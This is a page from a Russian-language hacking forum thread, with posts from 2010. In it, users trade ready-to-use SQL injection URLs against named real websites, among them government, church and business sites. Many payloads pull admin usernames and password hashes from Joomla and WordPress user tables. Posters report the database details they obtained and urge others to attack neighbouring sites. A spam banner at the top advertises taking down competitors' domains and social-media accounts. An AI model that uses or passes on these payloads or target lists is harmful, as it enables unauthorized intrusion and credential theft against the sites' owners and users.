УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 1326 из 1604

1326

Опции темы

Поиск в этой теме

Опции просмотра

#13251

04.10.2010, 02:32

cipa21

Новичок

Регистрация: 09.04.2009

Сообщений: 8

Провел на форуме:
71852

Репутация: 0

http://smu17.ru/stol.php?id=-1+union+select+1,concat(LOGIN,0x3a,PASS)+from+kapi tal_zed_users+limit+0,1--

Tic-30 админка /zed/

PS. через эту же скулю еще сотня соседей. Дерзайте

#13252

04.10.2010, 14:16

DarkDante

Новичок

Регистрация: 24.12.2004

Сообщений: 16

Провел на форуме:
110162

Репутация: 7

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//blinginbox.com/product.php?cateId=10&sx=-15+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--[/COLOR][/COLOR]

#13253

04.10.2010, 17:45

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

Код:

Code:
http://www.yuzhnoye.com/?id=14'%20and%20substring(version(),1,1)=5--%201&amp;path=about_company/history/missiles/missiles

#13254

04.10.2010, 18:06

Gedj

Познающий

Регистрация: 15.09.2008

Сообщений: 54

Провел на форуме:
612815

Репутация: 46

Код:

Code:
http://www.sportware.ru/?id=-91+and+1=0+union+select+1,2,version(),4,5,6,7--

Код:

Code:
http://www.multi-master.ru/service/detail.php?id=-10+union+select+1,version(),3--

#13255

04.10.2010, 19:00

av1

Участник форума

Регистрация: 06.10.2008

Сообщений: 165

Провел на форуме:
355997

Репутация: 66

Отправить сообщение для av1 с помощью ICQ

Код:

Code:
http://www.irancivilcenter.com/en/news/view.php?news_id=-3+union+select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,2,3,4,5--

Username: iranciv_icc82m@localhost

Version: 5.0.91-community

Database: iranciv_news

Google PR: 5

#13256

04.10.2010, 23:13

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

http://danlempriere.com/articles.php?id=2+and+substring((select+1),1,1)=tr ue

MDB2

нету прав нa mdb2 schema

#13257

05.10.2010, 00:41

grably

Новичок

Регистрация: 06.07.2009

Сообщений: 18

Провел на форуме:
54785

Репутация: 0

http://www.simport.ru/?page=3&id=2+and+1=0+union+select+1,2,group_concat %28table_name%29,4,5,6,7+from+information_schema.t ables+where+table_schema=database%28%29+--+

#13258

05.10.2010, 13:04

z0mbyak

Познающий

Регистрация: 10.04.2010

Сообщений: 49

Провел на форуме:
168709

Репутация: 1

Дырявая джумла:

--------------------------------------------------------------------------

http://www.reynoldsburgchurch.org/index.php? option=com_dcs_flashgames&Itemid=61&catid=51+union +all+select+1,2,3,4,concat_ws%280x3a,username,p ass word%29,6,7+from+jos_users--

--------------------------------------------------------------------------

http://www.pokermachinez.com/index.php? option=com_dcs_flashgames&Itemid=61&catid=51+union +all+select+1,2,user%28%29,4,@@version,6,concat_ws %280x3a,username,p ass word%29+from+jos_users--

--------------------------------------------------------------------------

http://www.sinab.gov.ec/index.php?option=com_restaurante&task=detail&Itemi d=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12, 1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3, 3,3,3,4,4,4,4,concat%280x1e,usernam e,0x3a,p ass word,0x1e,0x3a,usertype,0x1e%29+FROM+jos_users--&lang=it

--------------------------------------------------------------------------

http://www.sitgesrestaurantes.com/index.php?option=com_restaurante&task=detail&Itemi d=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12, 1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3, 3,3,3,4,4,4,4,concat%280x1e,us ername,0x3a,p ass word,0x1e,0x3a,usertype,0x1e%29+FROM+jos_users--&lang=it

--------------------------------------------------------------------------

http://www.sobakavdome.ru/index.php?option=com_iss&task=expotag&id=602+and+1 =0+union+select+0,1,2,3,4,group_concat%28us ername,0x3a,p ass word,0x3a,email%29+from+jos_users--

--------------------------------------------------------------------------

#13259

05.10.2010, 16:03

The Elusive

Guest

Сообщений: n/a

Провел на форуме:
1518

Репутация: 1

Код:

Code:
http://isfav.it/index.php?pag=materie&id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20distinct%20concat(0x7e,0x27,Hex(cast(schema_name%20as%20char)),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%202,1),0x31303235343830303536--

База isfav_db2

И пара других там еще есть =)

PR 4

#13260

05.10.2010, 21:00

z0mbyak

Познающий

Регистрация: 10.04.2010

Сообщений: 49

Провел на форуме:
168709

Репутация: 1

Бажный водпресс:

---------------------------------------------------------------------------

http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,group_concat(0x3a,use r_login,0x3a,user_p ass),6,7,8+from+wp_users--

---------------------------------------------------------------------------

http://www.fosa.biz/wp-admin/admin.php?page=people&action=printable&event_id=-15+union+select+0,1,2,concat_ws(user_login,0x3a,u ser_p ass),4+from+wp_users--

(Уникальная вещь для меня, первый раз получилось через админ.пхп скулю провести)

P.S. Сервак виндовый

---------------------------------------------------------------------------

http://www.kfir.co.il/news.php?id=23+and+1=0+union+select+1,group_concat (u ser_login,0x3a,user_p ass),3,4,5,6,7,8,9+from+wp_users--

---------------------------------------------------------------------------

http://www.topbeauty.ro/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,group_concat(0x3a,u ser_login,0x3a,user_p ass),6,7,8+from+wp_users--

---------------------------------------------------------------------------

http://www.bulldogdesigninc.com/News.php?id=12+AND+1=2+UNION+SELECT+0,1,2,3,group_ concat(user_login,0x3a,user_pass),5%20from%20wp_us ers--

---------------------------------------------------------------------------

http://www.jeremybouma.net/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--

---------------------------------------------------------------------------

http://staroftheseakeywest.com/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--

---------------------------------------------------------------------------

http://cycling4fun.com/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--

---------------------------------------------------------------------------

http://www.giveawayriches.com/jvblog/wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,n ull,concat(0x7c,user_login,0x7c,u ser_p ass,0x7c),null,null,null,null,null,null,null,null% 20%20from%20wp_users

---------------------------------------------------------------------------

З.Ы. Блин, да сколько же дырок-то....